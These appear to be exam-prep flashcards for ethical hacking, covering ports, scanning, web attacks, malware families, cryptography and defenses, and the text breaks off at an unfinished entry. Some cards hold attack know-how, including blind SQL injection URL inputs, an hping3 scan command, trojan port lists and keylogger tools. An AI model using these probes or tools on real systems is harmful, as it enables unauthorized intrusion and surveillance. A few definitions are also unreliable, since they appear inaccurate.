Corrupt the system and open system input/output ports to establish connections with remote systems, networks or servers to accomplish various malicious tasks Use port monitoring tools such as netstat, TCP View to scan suspicious ports and look for any connection established to unknown or suspicious IP addresses
Vulnerability Mgmt Life Cycle
Create baseline Vuln assessment Risk Assessment Remediation Verification Monitor pg 144
Scanning ICMP Network Services
ICMP Scanning Ping Sweep ICMP Echo Scanning
Another name for a ping sweep
ICMP sweep
Database Layer
This layer of the Web Application Architecture is comprised of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in structured form (e.g., MS SQL Server, MySQL server).
Filetype:
This operator allows you to search your results based on its file extension. [jasmine:jpg] will provide jpg files based on jasmine.
Android Vulnerability Scanners
o Threat Scan o Norton Halt exploit defender o Shellshock Scanner - Zimperium o Hackode o BlueBorne Vulnerability Scanner by Armis o EternalBlue Vulnerability Scanner
NetBIOS Codes
00- Hostname (unique)/ Domain name (Group) 03- Messager service running for the computer/individual loggein-user (Unique) 20 - Server Service running (Unique) 1D- Master browser name for the subnet (Group) 1B - Domain master browser name, identifies the Primary domain controller (PDC) for that domain (Unique)
BluePrinting
A footprinting technique performed by an attacker in order to determine the make and model of the target Bluetooth-enabled device
Application-based Point of Attack : Dynamic Runtime Injection:
Attackers manipulate and abuse the runtime of an application to circumvent security locks, logic checks, access privileged parts of an app, and even steal data stored in memory.
Defend Against LLMNR(Link Local Multicast Name Resolution/NBT-NS (NetBios Name Service) Poisoning
Disable LLMNR & NBT-NS
IoT OS : Brillo
It is an android based embedded OS, used in low-end devices such as thermostats
NOTIFY M-SEARCH
The SSDP protocol can discover Plug & Play devices, with uPnP (Universal Plug and Play). SSDP uses unicast and multicast adress (239.255.255.250). SSDP is HTTP like protocol and work with which methods.
Classical Ciphers
The most basic type of ciphers, which operate on alphabets (A-Z). Implementation of these ciphers is generally either by hand or with simple mechanical devices. Because these ciphers are easily deciphered, they are generally unreliable. Two types -Substitution cipher -Transposition cipher
Blind SQL Injection: WAITFOR DELAY (YES or NO Response)
Time Delay SQL injection (sometimes called Time-based SQL injection) evaluates the time delay that occurs in response to true or false queries sent to the database A waitfor statement stops SQL Server for a specific amount of time
National Vuln Dbase (NVD)
U.S. govt repository of standards-based vuln mgmt. data using Security Content Automation Protocol (SCAP). Enables automation of vuln mgmt, security measurement & compliance. Includes DBs of security checklist references, SW flaws, misconfigs, product names & impact metrics.
Digital Signature
Uses asymmetric cryptography to simulate the security properties of a signature in digital, rather than written form. A cryptographic means of authentication. Public-key cryptography uses asymmetric encryption and helps the user to create a digital signature. The two types of keys in public key cryptography are the private key (only signer knows this key and uses it to create digital signature) and the public key (more widely known and a relying party uses it to verify the digital signature).
Exploit
a breach of IT system security through vulnerabilities, in the context of an attack on a system or network.
Botnet
a group of computers "infected" by bots
Components of IoT
o Sensing technology o IoT Gateways o Cloud Server/ Data Storage o Remote Control using Mobile App
Post Attack Phase of Penetration testing
phase includes reporting, cleaning and artifact destruction. -This phase is critical to any penetration test, as it is the responsibility of the tester to restore the systems to the pretest state. -The objective of the test is to show where security fails, and unless there is a scaling of the penetration test agreement, whereby the tester is assigned the responsibility of correcting the security posture of the systems, this phase must be completed.
IMAP (Internet Message Access Protocol) port
143
Firewall Architectures
Bastion Host Screened Subnet Multi-homed Firewall
Double-Blind Testing
(also known as "zero-knowledge testing"), -neither the pen-tester knows about the target nor the target is informed of an audit scope (what, how, and when the pen-tester will test) prior to test execution.
Telnet port
23
SNMP: getnextrequest
continuously grabs info from the agent for all data
Cookie/Session Poisoning
-By changing the information inside a cookie, attackers bypass the authentication process; once they gain control over a network, they can modify its content, use the system for a malicious attack, or steal information from users' systems. In this attack, the attacker sniffs the user's cookies and then modifies the cookie parameters and submits them to the web server. One of the easiest examples involves using the cookie directly for authentication.
Countermeasures
1. Place Web Servers in Separate Secure Server Security Segment on Network -The first step in securing web servers is to place them separately in DMZ that is isolated from public network as well as internal network in the web-hosting network.
Indication of Virus Attack
1. process take more resources and time 2. computer beeps with no display 3. drive label changes 4. unable to load Operating System 5. constant anti-virus alerts 6. computer freezes frequently or encounters error such as BSOD 7. files and folders are missing 8. suspicious hard driver activity 9. browser window freezes" 10. lack of storage space 11. unwanted advertisements and pop-up windows
Configuring Port Security on Cisco switch
1. switchport port-security -Enables port security on the interface. 2. switchport port-security maximum 1 vlan access -Sets the maximum number of secure MAC addresses for the interface. The range is 1 to 3072. The default is 1. 3. switchport port-security violation restrict -Sets the violation mode, the action to be taken when a security violation {restrict | shutdown} is detected. 4. switchport port-security aging time 2 -Sets the aging time for the secure port to 2 minutes 5. switchport port-security aging type inactivity -The type keyword sets the aging type as absolute or inactive. 6. snmp-server enable traps port-security trap-rate 5 -Controls the rate at which SNMP traps are generated.
Common Ports used by Trojans
2 - Death 20 - Senna Spy 21 - Blade Runner, Doly Trojan, Fore 22 -Shaft, SSH RAT 23 - Tiny Telnet Server 25 - Antigen, Email Password Sender, Terminator, WinPC, WinSpy 80 -Necurs, NetWire, Ismdoor, Poison Ivy 445 -WannaCry, Petya 1177- njRAT 1095-98 - RAT 8080 - Zeus
SMTP port
25
LDAP port
389
default size of UDP
512 bytes
Printer port
515
DNS port
53 tcp - 53 udp
DHCP port
67
TFTP port
69
Service Set Identifier (SSID)
A 32 alphanumeric character unique identifier given to wireless local area network (WLAN) that acts as a wireless identifier on the network. It permits connections to the required network among an available independent network. Devices connecting to the same WLAN should use the same SSID to establish the connection Identifies an 802.11 (Wi-Fi) network
Patch Management
A defense against vulnerabilities that cause security weakness, or corrupts data. It is a process of scanning for network vulnerabilities, detecting the missed security patches and hotfixes and then deploying the relevant patches as soon as they are available to secure the network. It involves the following: - Choosing, verifying, testing, and applying patches - Updating previously applied patches with current patches - Listing patches applied previously to the current software - Recording repositories, or depots, of patches for easy selection - Assigning and deploying the applied patches Tools -Symantec Client Management Suite -MaaS360 Patch Analyzer -Solarwinds Patch Manager -BatchPatch -Patch Connect Plus
Access point (AP or wireless AP)
A device that receives the signals and transmits signals back to wireless network interface cards (NICs). Used to connect wireless devices to a wireless/wired network. It allows wireless communication devices to connect to a wireless network through wireless standards such as Bluetooth and Wi-Fi. It serves as a switch or hub between the wired LAN and wireless network.
MD4
A message digest algorithm that produces a 128-bit hash value and performs only 3 rounds of computations. It is used to verify data integrity through the creation of a 128-bit message digest from data input.
Bypass Client-side Control
A web application requires client side controls to restrict user inputs in transmitting data via client components and implementing measures on controlling the user's interaction with his or her own client. Techniques to bypass the client-side controls: - Attack Hidden Form Fields: Identify hidden form fields in the web page and manipulate the tags and fields to exploit the web page before transmitting the data to the server. - Attack Browser Extensions: Attempt to intercept the traffic from the browser extensions or decompile the browser extensions to capture user data. - Perform Source Code Review: Perform source code review to identify vulnerabilities in the code that cannot be identified by the traditional vulnerability scanning tools.
HTTP Strict Transport Security (HSTS)
A web security policy that protects HTTPS websites against man-in-the-middle attacks. HSTS policy helps web servers to enforce web browsers to interact with it using secure HTTPS protocol. With HSTS policy, all the insecure HTTP connections are automatically converted into HTTPS connections. This policy ensures that all the communication between the web server and web browser is encrypted and all responses that are delivered and received are originated from an authenticated server.
Web Services Atk
A web service can interact directly with the web application without the need for an interactive user session or a browser. -Attacker can get into the target web applications by exploiting an application integrated with vulnerable web services. An attacker injects a malicious script into a web service and is able to disclose and modify application data
Web Shell
A web-based script that allows access to a web server. Can be created in all the operating systems - Attackers create this to inject malicious script on a web server to maintain persistent access and escalate privileges -an be used as a backdoor
Fake Antivirus
A well-designed, fake antivirus looks authentic and often encourages users to install it on their systems, or perform updates, or remove viruses and other malicious programs Once installed these fake antivirus can damage target systems similar to other malware.
MD5
A widely used cryptographic hash function that takes a message of arbitrary length as input and generates a 128-bit (16-byte) fingerprint or message digest. This algorithm comes into use in a wide variety of cryptographic applications and is useful for digital signature applications, file integrity checking, and storing passwords. On the other hand, it is not collision resistant and it can be cracked by brute-force attack
hping3 -A 10.0.0.25 -p 80
ACK Scanning on Port 80 -A -You can use this scan technique to probe for the existence of a firewall and its rule sets.
Component functions in a Cisco's Wireless IPS Deployment
APs in Monitor Mode: Provides constant channel scanning with attack detection and packet capture capabilities. Mobility Services Engine (running wireless IPS Service): The central point of alarm aggregation from all controllers and their respective wireless IPS Monitor Mode APs. Alarm information and forensic files are stored on the system for archival purposes. Local Mode AP(s): Provides wireless service to clients in addition to time-sliced rogue and location scanning. Wireless LAN Controller(s): Forwards attack information from wireless IPS Monitor Mode APs to the MSE and distributes configuration parameters to APs. Wireless Control System: Provides the means to configure the wireless IPS Service on the MSE, push wireless IPS configurations to the controller, and set APs into wireless IPS Monitor mode. It is also used for viewing wireless IPS alarms, forensics, reporting, and accessing the threat encyclopedia.
How Does ARP Spoofing Work
ARP spoofing succeeds by changing the IP address of the attacker's computer to the IP address of the target computer. A forged ARP request and reply packet find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends frames to the attacker's computer, where the attacker can modify the frames before sending them to the source machine (User A) in an MITM attack. In addition, the attacker can also launch a DoS attack by associating a non-existent MAC address to the IP address of the gateway, or may sniff the traffic passively and then forward it to the target destination.
Security Accounts Manager (SAM) Database
Active Directory Database to manage user accounts and passwords in the hashed format (one-way hash). It is not possible to copy the SAM file to another location in the case of online attacks. Because the system locks the SAM file with an exclusive file system lock, a user cannot copy or move it while Windows is running. However, to make the password hashes available for offline brute-force attacks, attackers can dump the on-disk contents of the SAM file using various techniques. The SAM file uses a SYSKEY function (in Windows NT 4.0 and later versions) to partially encrypt the password hashes
Two modes Application-layer firewalls can fuction at
Active application-level firewalls: -They examine all incoming requests, including the actual message that exchanged against known vulnerabilities, such as SQL injection, parameter and cookie tampering, and cross-site scripting. -The requests deemed genuine are allowed to pass through them. Passive application-level firewalls: -They work similarly to an IDS, in that they also check all incoming requests against known vulnerabilities, but they do not actively reject or deny those requests if a potential attack is discovered
HTTP Response Splitting Atk
Adding header response data to input field so that the server splits the response into two parts -This type of attack exploits vulnerabilities in input validation -Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and SQL Injection are some of the examples of this type of attack
Password Salting
Adding random string of characters to password before calculating hash. Makes it more difficult to reverse engineer the hash. User &/or app can do this to prevent rainbow table attacks (not a feature in Windows yet) Same pass but different hashes due to different salts. Windows passwords are not salted
Full CAM Tables
Additional ARP requests flood the switch and broadcasts all incoming traffic to all ports. This changes the behavior of the switch to reset to its learning mode, broadcasting on every port like a hub. The switch then works like a hub through which you (the attacker) monitor the frames sent from victim host to another host without any CAM table entry. This attack also fills the CAM tables of adjacent switches
Digital Signature Algorithm (DSA)
Adopted as FIPS 186-2 Helps in the generation and verification of digital signatures for sensitive and unclassified applications. It creates a 320-bit digital signature but with 512-1024 bit security. A public-key crypto system as it involves the use of both private and public keys Processes involved in DSA: o Signature Generation Process: The private key is used to know who has signed it. o Signature Verification Process: The public key is used to verify whether the given digital signature is genuine.
Pros and Cons of Virtual Private Network (VPN)
Advantages - A VPN hides all the traffic that flows over it, ensures encryption, and protects the data from snooping. - It provides remote access for protocols without letting people attack from the Internet at large. Disadvantages - As the VPN runs on a public network, the user will be vulnerable to an attack on the destination network.
Pros and Cons of NAT
Advantages - Network address translation helps to enforce the firewall's control over outbound connections. - It restricts incoming traffic and allows only packets that are part of a current interaction initiated from the inside. - Helps hide the internal network's configuration and thereby reduces the success of attacks on the network or system. Disadvantages - The NAT system has to guess how long it should keep a particular translation, which is impossible to guess correctly every time. - The NAT interferes with encryption and authentication systems to ensure the security of the data. - Dynamic allocation of ports may interfere with packet filtering.
Pros and Cons of an Application Proxy
Advantages - Proxy services can be good at logging because they can understand application protocols and effectively allow logging. - Proxy services reduce the load on network links as they are capable of caching copies of frequently requested data and allow it to be directly loaded from the system instead of the network. - Proxy systems perform user-level authentication, as they are involved in the connection. - Proxy systems automatically protect weak or faulty IP implementations as it sits between the client and the internet and generates new IP packets for the client. Disadvantages - Proxy services lag behind non-proxy services until the suitable proxy software is available. - Each service in a proxy may use different servers. - Proxy services may require changes in the client, applications, and procedures.
Sniffing Post Office Protocol (POP)(110)
Allows a user's workstation to access mail from a mailbox server. A user can send mail from the workstation to the mailbox server via the Simple Mail Transfer Protocol (SMTP). Attackers can easily sniff the data flowing across a POP network in clear text because of the protocol's weak security implementations
Technitium MAC Address Changer
Allows you to change (spoof) the Media Access Control (MAC) Address of your Network Interface Card (NIC) instantly. It has a very simple user interface and provides ample information regarding each NIC in the machine. Every NIC has a MAC address hard coded in its circuit by the manufacturer. This hard-coded MAC address is used by windows drivers to access the Ethernet Network (LAN). This tool can set a new MAC address to your NIC, bypassing the original hard coded MAC address.
FaceNiff
Allows you to sniff and intercept web session profiles over the wifi that your mobile is connected to It is possible to hijack sessions only when wifi is not using EAP, but it should work over any private networks
Anti-Keyloggers
Also called anti-keystroke loggers, detect and disable keystroke logger software. Anti-keylogger's special design helps them to detect software keyloggers. Zemana AntiLogger i - s a software application that blocks hackers. It detects any attempts to modify your computer's settings, record your activities, hook to your PC's sensitive processes, or inject malicious code in your system GuardedID KeyScrambler SpyShelter Free Anti-Keylogger DefenseWall HIPS Elite Anti Keylogger
Yagi Antenna
Also called as Yagi Uda antenna, is a unidirectional antenna commonly used in communications for a frequency band of 10 MHz to VHF and UHF. Improving the gain of the antenna and reducing the signal-to-noise (SNR) level of a radio signal are the focus of this antenna. It consists of a reflector, dipole, and many directors. This antenna develops an end fire radiation pattern.
IoT OS: Ubuntu Core
Also known as Snappy, it is used in robots, drones, edge gateways, etc.
Encryption Viruses
Also known as a Cryptolocker viruses which penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on Uses simple encryption to encipher the code The virus is encrypted with a different key for each infected file AV scanner cannot directly detect these types of viruses using signature detection methods
Asymmetric Encryption
Also known as public key cryptography, Uses a key pair, one public key available to anyone (encrypt) , and one private key held only by the key owner (decrypt)
Keyloggers for Mac
Amac -application that allows users who want to spy on users of Macintosh computers and secretly record all information, including passwords, keystrokes, chat conversations, websites visited and screenshots captured. It also sends all reports to the attacker by email, or uploads everything to attacker's website Elite Aobo (OS X) KidLogger for Mac Perfect Keylogger for Mac
Main Function of IDS
An IDS gathers and analyzes information from within a computer or a network, to identify the possible violations of security policy, including unauthorized access, as well as misuse. An IDS is also referred as a "packet-sniffer," which intercepts packets traveling along various communication mediums and protocols, usually TCP/IP. The packets are analyzed after they are captured. An IDS evaluates traffic for suspected intrusions and signals an alarm after detection.
Secure Socket Layer (SSL)
An application layer protocol developed by Netscape for managing the security of a message transmission on the Internet. A protocol used to provide a secure authentication mechanism between two communicating applications, such as a client and a server Uses RSA asymmetric (public key) encryption to encrypt data transferred over SSL connections. Requires a reliable transport protocol, such as TCP, for data transmission and reception (three-way handshake)
Compromised Session IDs using Sniffing
An application level technique in which an attacker sniffs a connection to find the session ID, he can gain access to the resources. Uses Tools such as Wireshark, SteelCentral Packet Analyzer among others to intercept the HTTP traffic between the victim and the web server. He/she then analyzes the data in the captured packets to identify valuable information such as session IDs, passwords. Once the session ID is determined, the attacker masquerades himself/herself as the victim and sends the session ID to the web server before the victim. Attacker uses the valid token session to gain unauthorized access to the web server. This way, an attacker takes control over an existing legitimate session.
Nessus Pro
An assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. A vulnerability scanning platform for auditors and security analysts. Users can schedule scans across multiple scanners, use wizards to easily and quickly create policies, schedule scans and send results via email.
Testing MySQL & MSSQL
An attacker can identify blind SQL injection vulnerabilities just by testing the URLs of a target website. For example, consider the following URL: *shop.com/items.php?id=101* The corresponding SQL query is *( SELECT * FROM ITEMS WHERE ID = 101* )* Now, give a malicious input such as 1=0, to perform blind SQL injection *shop.com/items.php?id=101 and 1=0* The resultant SQL query is *( SELECT * FROM ITEMS WHERE ID = 101 AND 1 = 0 )* The above query will always return FALSE because 1 never equals to 0. Now, attackers try to obtain TRUE result by injecting 1=1 *(shop.com/items.php?id=101 and 1=1 The resultant SQL query is SELECT * FROM ITEMS WHERE ID = 101 AND 1 = 1 )* Finally, the shopping web application returns the original items page. With the above result, an attacker identifies that the above URL is vulnerable to blind SQL injection attack.
Union SQL Injection
An attacker combines a forged query with a query requested by the user by using a UNION clause.
IoT Framework Security Considerations : Gateway
An ideal framework for this should incorporate strong encryption techniques for secure communications between endpoints
Identify Server-side Technologies
Analyze HTTP headers & HTML source code Examine URLs, error page messages, session tokens httprint -is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings or by plug-ins such as mod_security or servermask
Ping Sweep Tools
Angry IP scanner - is an IP address and port scanner. It can scan IP addresses at any range as well as any of their ports. SolarWinds NetScan Tool Pro Colasoft Ping Tool Visual Ping Tester OpUtils Pinkie MegaPing
OWASP A2: Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens or to exploit other implementation flaws to assume other users' identities (temporarily or permanentl Session ID in URLs Pwd Exploit Timeout Exploit
What is a Cross-site Request Forgery Attack (CSRF or XCRF) attack?
Application level technique Also known as a one-click attack or session riding, exploits victim's active session with a trusted site to perform malicious activities such as purchase an item, modify, or retrieve account information. In this web attack, an attacker forces the victim to submit the attacker's form data to the victim's Web server. The attacker creates the host form, containing malicious information, and sends it to the authorized user. The user fills in the form and sends it to the server. Because the data is coming from a trusted user, the Web server accepts the data. - exploits the trust that a website has in a user's browser.
Session Hijacking Using Proxy Servers
Application level technique Attackers lure victim to click on bogus link which looks legitimate but redirect user to attacker's server. The attacker then forwards the request to the legitimate server on behalf of victim
Even More Countermeasures to defend against SQL
Apply least privilege rule to run the applications that access the DBMS Validate user-supplied data as well as data obtained from untrusted sources on the server side Avoid quoted/delimited identifiers as they significantly complicate all whitelisting, black-listing and escaping efforts Use a prepared statement to create a parameterized query to block the execution of query Ensure that all user inputs are sanitized before using them in dynamic SQL statements Use regular expressions and stored procedures to detect potentially harmful code Avoid the use of any web application which is not tested by web server Isolate the web server by locking it in different domains Ensure all software patches are updated regularly Regular monitoring of SQL statements from database-connected applications to identify malicious SQL statements Use of Views should be necessary to protect the data in the base tables by restricting access and performing transformations Disable shell access to the database Do not disclose database error information to the end users Use safe API that offers a parameterized interface or that avoids the use of the interpreter completely
DDoS Trojan
Are intended to perform DDoS attack on the target machines, networks, or web addresses. This type of Trojans makes the victim a Zombie to listen for commands sent from a DDoS Server on the internet. Mirai is the most notorious DDoS Trojan that connects the victim machine to a command-and control server and then it performs DDoS attacks in which a firehose of junk traffic flood a target's servers/machines with malicious traffic
Integrity Attacks
Attack involves changing or altering data during transmission. Attackers send forged control, management, or data frames over a wireless network to misdirect wireless devices in order to perform another type of attack (e.g., DoS) Types o Data Frame Injection -Constructing and sending forged 802.11 frames -Tools Airpwn, File2air, libradiate, void11, WEPWedgie, wnet dinject/reinject o WEP Injection -Constructing and sending forged WEP encryption keys. -Methods/tools -WEP cracking + injection tools o Bit-Flipping Attacks - Capturing the frame and flipping random bits in the data payload, modifying ICV, and sending to the user.
Distributed Denial of Service (DDoS)
Attack is a large-scale, coordinated attack on the availability of services on a victim's system or network resources, launched indirectly through many compromised computers (botnets) on the Internet. An attack uses many computers to launch a coordinated DoS attack against one or more targets. The primary objective of any attacker is to first gain administrative access on as many systems as possible. Mainly aimed at the network bandwidth, exhaustion of network, application, or service resources, thereby restricting the legitimate users from accessing their system or network resources.
Wrapping Attack
Attack is performed during the translation of SOAP message in the TLS layer where attackers duplicate the body of the message and send it to the server as a legitimate user.
Footprinting
Attacker collects intel about a target network (i.e. attack vectors). -FFirst step in any attack -Passive footprinting = w/o direct interaction -Active = direct interaction
Side Channel Attacks or Cross-guest VM Breaches
Attacker compromises the cloud by placing a malicious virtual machine near a target cloud server and then launch side channel attack. In this attack, the attacker runs a virtual machine on the same physical host of the victim's virtual machine and takes advantage of shared physical resources (processor cache) to steal data (cryptographic key) from the victim.
Detecting Layer 7 Tar Pits
Attackers can identify the presence of Layer 7 tar pits by looking at the latency of the response from the service.
Other Spyware
Audio, Video, Print, GPS and telephone/Cellphone spyware
PoisionIvy
Backdoor Tool Features: - File modification, deletion, and transfer to and from the infected system - The Windows registry can be viewed and edited - Currently, running processes can be viewed and suspended or killed - Current network connections can be viewed and shut down o Services can be viewed and controlled (for example stopped or started) - Installed devices can be viewed, and some devices can be disabled - The list of installed applications can be viewed, and entries can be deleted or programs can be uninstalled - Access Windows Command shell on the infected computer - Steal information by taking screenshots of the desktop and recording audio or webcam footage - Access saved passwords and password hashe
A ping sweep or Internet Control Message Protocol (ICMP) scanning
Basic network scanning technique that is employed to determine which range of IP addresses map to live hosts (computers). is a process of sending an ICMP request or ping to all hosts on the network to determine which one is up among the oldest and slowest methods used to scan a network.
SSH Tunneling Tool
Bitvise -It provides secure remote login capabilities to Windows workstations and servers by encrypting data during transmission Secure Pipes -OS X based SSH tunneling software. Some of the features it includes are remote forward, Local Forward and SOCKS Proxies
Black hole filtering
Black hole refers to network nodes where incoming traffic is discarded or dropped without informing the source that the data did not reach the intended recipient. A process of silently dropping the traffic (either incoming or outgoing traffic) so that the source is not notified about discarding of the packet. It uses Border Gateway Protocol (BGP) host routes to route traffic heading to victim servers to a "null0" next hop
Countermeasures: Protocols
Block all unnecessary ports, Internet Control Message Protocol (ICMP) traffic, and unnecessary protocols such as NetBIOS and SMB. Harden the TCP/IP stack and consistently apply the latest software patches and updates to system software. If using insecure protocols such as Telnet, POP3, SMTP, and FTP, then take appropriate measures to provide secure authentication and communication, for example, by using IPSec policies. If remote access is needed, make sure that the remote connection is secured properly, by using tunneling and encryption protocols. Disable WebDAV if not used by the application or keep secure if it is required
Why do you need HTTP Tunneling
Blocking of TCP/IP ports, traffic initiated from outside the network, and, network protocols except for a few commonly used protocols, etc. Access to surf denied websites Post in forums anonymously by hiding the IP address To use an application such as chatting through ICQ or IRC, instant messengers, games, browsers, etc. Sharing of confidential resource over HTTP securely Downloading files with filtered extensions and/or with malicious cod
BluetoothView
Bluetooth Hacking Tool A utility that monitor the activity of Bluetooth devices around you. For each detected Bluetooth device, it displays the information like device name, bluetooth address, major device type, minor device type, first detection time, last detection time, etc. It can also notify you when a new bluetooth device is detected.
Necurs
Botnet Tool It delivers some of the worst banking Trojans and ransomware threats in batches of millions of emails at a time, and it keeps reinventing itself. It gets distributed by Spam e-mails and downloadable content from questionable/illegal sites. Features: -o Destruction of the system -o Turning PC into a spying tool -o Electronic money theft -o Botnet and mining -o Serving as a gateway for other viruses
Even more Web Application Threats
Buffer Overflow -A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. CAPTCHA Attacks -CAPTCHA is a challenge-response type test implemented by the web applications to ensure whether the response is generated by the computer or not. Though these CAPTCHAs are designed to be unbreakable, these are prone to various types of attacks. Platform Exploits -Users can build various web applications by using different platforms such as BEA Web logic and Cold Fusion. Each platform has its various vulnerabilities and exploits associated with it. Network Access Attacks -Network access attacks can majorly affect web applications, including basic level of service. They can also allow levels of access that standard HTTP application methods could not grant. DMZ Protocol Attacks -The DMZ ("demilitarized zone") is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network. -An attacker, who is able to compromise a system that allows other DMZ protocols, has access to other DMZs and internal systems.
Detecting WAF and Proxies on Target Site
By applying footprinting techniques, the attempt would provide its proxy IP address, not its legitimate address. - use TRACE method Web app firewalls (WAFs) are security devices deployed between the client and server. These devices are like intrusion prevention systems that provide security for web applications against a wide range of attacks WAFW00F - allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website. It detects the WAF at any domain
Web Server Footprinting/Banner Grabbing
By performing this, you can gather valuable system-level data such as account details, OS, software versions, server names, and database schema detail Netcat -This is a networking utility that reads and writes data across network connections, using the TCP/IP protocol. -It is a reliable "back-end" tool used directly or driven by other programs and scripts. -It is also a network debugging and exploration tool. Telnet -is a network protocol. It is widely used on the Internet or LANs. It is a client-server protocol. It provides the login sessions for a user on the Internet. The single terminal attached to other computer emulates with Telnet. The primary security problems with Telnet are the following: -o It does not encrypt any data sent through the connection. -o It lacks an authentication scheme. Netcraft -determines the OS of the queried host by looking in detail at the network characteristics of the HTTP response received from the website httprecon -is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on the target web server ID Serve -a simple Internet server identification utility -Does server identification and reverse DNS lookup Recon-ng - footprinting tool
Information Gathering tools
Censys - is a public search engine and data processing facility backed by data collected from ongoing Internet-wide scans. Censys supports full-text searches on protocol banners and queries a wide range of derived fields Thingful - is a search engine for the Internet of Things to find and use open IoT data from around the world. It helps organizations make better decisions with external IoT data
More ways to defend against DNS Hijacking
Change the default router password that comes with the factory settings Domain Name System Security Extensions (DNSSEC): It adds an extra layer to DNS that prevents DNS from being hacked. Strong Password Policies and User Management: Use of strong passwords further enhances the security. Better Service Level Agreements (SLAs) from DNS Service Providers: When signing up to DNS servers with DNS service providers, learn who to contact when there is an issue, how to receive better quality of reception and support, and whether the DNS server's infrastructure is hardened against attack, and so on. Configuring a Master-Slave DNS within your Network: Use a Master-Slave DNS and configure the master without internet access. Maintain two slave servers instead, so that even if someone hacks a slave, it will update only when it receives an update from the master. Constant Monitoring of DNS Servers: Constant monitoring of DNS server ensures that a website is returning the correct IP address.
Pen Test: Executing Applications
Check of antvirus software is installed and up to date -check if firewall software and anti-keylogging software are installed -Check if the hardware systems are secured in a locked environment -Try Keyloggers >All In One Keylogger >Spyrix Personal Monitor >SoftActivity Activity Monitor >Elite Keylogger, -Use spywares > Spytech SpyAgent > Power Spy, > ACTIVTrak > Veriato 360 > NetVizor, Activity Monitor -Use remote execution tools o install applications remotely > RemoteExe > PDQ Deploy >Dameware Remote Support,
Intrusion Detection Systems (IDS)
Checks traffic & senses alarms A security software or hardware device used to monitor, detect, and protect networks or system from malicious activities It monitors both inbound/outbound traffic of the network and checks for suspicious activities continuously that may indicate a network or system security breach. It checks traffic for signatures that match known intrusion patterns One of the most common places to deploy IDS is near the firewall, Placed inside, the IDS will be ideal if it is near a DMZ;however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network.
Qualys Vulnerability Mgmt
Cloud-based svc built to ID threats and monitor changes Features -Agent-based detection -Constant monitoring and alerts -Comprehensive coverage and visibility -VM for the perimeter-less world -Discover forgotten devices and organize your host assets -Scan for vulnerabilities everywhere, accurately and efficiently -Identify and prioritize risks -Remediate vulnerabilities
Information Collected during the Pre-attack Phase
Competitive intelligence Network registration information DNS and mail-server information Operating-system information User information
Email Virus
Computer code sent to you as an email attachment which, if activated , will cause some unexpected and unusually harmful effect such as destroying certain files on your hard disk. It runs the gamut - from creating pop-ups to crash systems or stealing personal data
Web Scripting Viruses
Computer security vulnerability through websites that breaches your web browser security Allows the attacker to inject client-side scripting into the web page PNormally two types: non-persistent and persistent A persistent attack is when you directly get your cookies stolen, and the attacker can hijack your session. This allows the attacker to impersonate you and can lead to much damage. Prevention -The best ways to prevent these viruses and exploits are by safely validating untrusted HTML input, cookie security, disabling scripts, and using scanning services like an anti-virus which has real-time protection on your web browser -also beneficial to not visit unknown websites and using World of Trust to make sure that the site is safe.
Elements of Information Security or Information Assurance (IA)
Confidentiality Integrity Availability Authenticity Non Repudiation
SMTP Enumeration Countermeasures
Configure SMTP servers to: Ignore email messages to unknown recipients Not to include sensitive mail server and local host information in mail responses Disable open relay feature By default, LDAP traffic is transmitted unsecured; use SSL or STARTTLS technology to encrypt the traffic Select a user name different from your email address and enable account lockout Restrict the access to Active Directory by using software such as Citrix
More Web Application Threats
Cookie Snooping -Attackers use cookie snooping on victim systems to analyze users' surfing habits and sell that information to other attackers or to launch various attacks on the victims' web applications. Hidden Field Manipulation -Attackers attempting to compromise e-commerce websites mostly use these types of attacks. They manipulate hidden fields and change the data stored in them. Several online stores face this type of problem every day. -Attackers can alter prices and conclude transactions, designating the prices of their choice. Authentication Hijacking -To identify a user, every web application employs user identification method such as an ID and password. However, once attackers compromise a system, various malicious things such as session hijacking and user impersonation can occur. Obfuscation Application -Attackers usually work hard at hiding their attacks and avoid detection. -Network and host-based intrusion detection systems (IDSs) are constantly looking for signs of well-known attacks, driving attackers to seek different ways to remain undetected. -The most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, Base64, or URL encoding. -Unicode is a method of representing letters, numbers, and special characters to properly display them, regardless of the application or underlying platform. Broken Session Management -When security-sensitive credentials such as passwords and other important data are not properly secured, attackers can easily compromise them. Broken Account Management -Vulnerable account management functions including account update, forgotten, or lost password recovery or reset and other similar functions might weaken valid authentication schemes. Denial-of-Service (DoS) -A denial-of-service or DoS attack, is an attack on the availability of a service, that reduces, restricts, or prevents accessibility of system resources to its legitimate users. For instance, a website related to a banking or email service is not able to function for a few hours or even days, resulting in loss of time and money.
Web Mirroring
Copying a website directly to your system to test offline HTTrack Black Widow WebRipper Pavuk Teleport Pro Gnu Wget Backstreet Browser
OpenSSL
Cryptography Toolkit An open source cryptography toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) network protocols and related cryptography standards required by them. The openssl program is a command line tool for using the various cryptography functions of OpenSSL's crypto library from the shell. Can be used for: o Creation and management of private keys, public keys, and parameters o Public key cryptographic operations o Creation of X.509 certificates, CSRs, and CRLs o Calculation of Message Digests o Encryption and Decryption with Ciphers o SSL/TLS Client and Server Tests o Handling of S/MIME signed or encrypted mail o Time Stamp requests, generation, and verification
FortiDDoS
DDoS Protection Hardware Tools -provides comprehensive protection against DDoS attacks. It helps you protect your Internet infrastructure from threats and service disruptions by surgically removing network and application layer DDoS attacks, while letting legitimate traffic flow without being impacted
DDoS Protector
